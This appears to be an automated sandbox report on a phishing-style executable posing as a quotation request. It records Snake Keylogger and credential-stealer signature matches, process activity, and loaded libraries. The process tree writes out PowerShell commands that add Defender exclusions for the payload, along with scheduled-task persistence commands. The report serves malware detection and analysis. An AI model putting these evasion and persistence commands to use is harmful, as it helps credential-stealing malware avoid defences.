Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NuDUTBObHpKADz.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.cs Base64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.cs Base64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.AddAccessRule
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/25@3/3
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Mutant created: \Sessions\1\BaseNamedObjects\upSDuQ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File created: C:\Users\user\AppData\Local\Temp\tmp8B51.tmp
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003378000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003353000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003385000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: unknown Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
